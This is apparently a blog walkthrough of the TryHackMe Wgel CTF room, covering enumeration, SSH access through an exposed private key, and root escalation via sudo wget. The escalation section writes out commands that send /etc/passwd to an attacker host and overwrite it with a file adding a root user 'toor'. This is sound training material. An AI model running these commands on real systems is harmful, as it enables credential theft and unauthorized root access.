THM ROOM: Wgel CTF Walkthrough
Welcome to the Wgel TryHackMe room! In this blog post, we’ll walk through the step-by-step process of gaining root access to the target machine. Let’s get started!
TryHackMe Challenge Link: https://tryhackme.com/room/wgelctf
Reconnaissance — Nmap Scan:
The first step in any hacking endeavor is reconnaissance. We initiated an Nmap scan with the following command to identify open ports and services on the target machine
sudo nmap -sV -sS -A <IP>
Our scan revealed two open ports:
- Port 22 (SSH) running OpenSSH 7.2p2 on Ubuntu.
- Port 80 (HTTP) hosting an Apache web server on Ubuntu.
Directory Enumeration:
gobuster dir -u http://<IP>/ -x php,txt -w /usr/share/wordlists/dirb/common.txt -t 20
Our initial scan led us to a directory named “/sitemap,” which immediately caught our attention. We proceeded to enumerate the contents of this directory
gobuster dir -u http://<IP>/sitemap/ -x php,txt -w /usr/share/wordlists/dirb/common.txt -t 20
We discovered a directory “.ssh” via enumeration, and while exploring the directory, I discovered a file named “id_rsa.” This is a significant discovery as it could potentially provide us with SSH access.
The id_rsa file contains a private key, which is a password for accessing SSH; despite this, we do not know the username. After some digging, I discovered something interesting in the source code of Apache’s default webpage.
Initial Foothold — SSH Access:
ssh -i id_rsa jessie@<IP>
Our SSH connection was successful, granting us initial access to the system. However, the real challenge was yet to come.
Exploring further we found user flag.
Privilege Escalation:
Now that we had access as the user “jessie,” our next goal was to escalate privileges to root.
I checked sudo -l and discovered that the wget program can be launched as root, making it a possible attack vector for privilege escalation.
There are various ways to priv esc from wget, but here is the simplest.
Here are the steps I took to gain root access:
- We leveraged the “sudo /usr/bin/wget” command to download a file, in this case, the “/etc/passwd” file, to our own server. (TUN0_IP = Kali_Linux_IP)
sudo /usr/bin/wget --post-file=/etc/passwd http://<YOUR_TUN0_IP>:5555
- We listened for incoming connections and captured the “/etc/passwd” file.
nc -lvnp 5555
- We added a new user to the “/etc/passwd” file with root privileges.
echo "toor:`openssl passwd toor`:0:0:root:/root:/bin/bash" >> passwd
- We hosted the modified “/etc/passwd” file on a local HTTP server.
python3 -m http.server
- We used “wget” to retrieve the hosted “/etc/passwd” file, effectively creating a new user with root access.
sudo /usr/bin/wget http://<YOUR_TUN0_IP>:8000/passwd -O /etc/passwd
- Finally, we switched to the newly created user and gained root access to the system. username: toor, password: toor
su toor
# will ask for password
# Password is toor
Here’s a short video to help you understand.
Retrieving Flags:
With root access secured, we were able to retrieve both the user and root flags.
- The user flag was located in the “/home/jessie/Documents/user_flag.txt” file.
- The root flag was stored in the “/root/root_flag.txt” file.